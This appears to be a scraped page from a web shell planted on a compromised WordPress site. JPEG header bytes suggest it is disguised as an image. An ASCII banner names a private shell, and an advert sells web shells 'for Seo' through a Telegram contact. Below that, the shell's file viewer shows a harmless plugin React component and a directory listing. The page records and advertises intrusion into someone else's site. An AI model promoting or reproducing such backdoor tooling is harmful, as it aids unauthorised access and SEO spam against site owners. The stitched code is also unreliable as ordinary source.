����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { Snackbar } from '@wordpress/components';
import { __ } from '@wordpress/i18n';
import { AnimatePresence, motion } from 'framer-motion';
export const RetryNotice = ({ show }) => {
if (!show) return null;
return (
<AnimatePresence>
<motion.div className="fixed bottom-[20px] right-0 z-max flex justify-end px-4 pb-4">
<div className="shadow-2xl">
<Snackbar>
{__(
'Just a moment, this is taking longer than expected.',
'extendify-local',
)}
</Snackbar>
</div>
</motion.div>
</AnimatePresence>
);
};
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| content | Folder | 0755 |
|
|
| topbar | Folder | 0755 |
|
|
| ConfirmationModal.jsx | File | 1.43 KB | 0644 |
|
| MainButton.jsx | File | 1.77 KB | 0644 |
|
| Modal.jsx | File | 6.95 KB | 0644 |
|
| RetryNotice.jsx | File | 563 B | 0644 |
|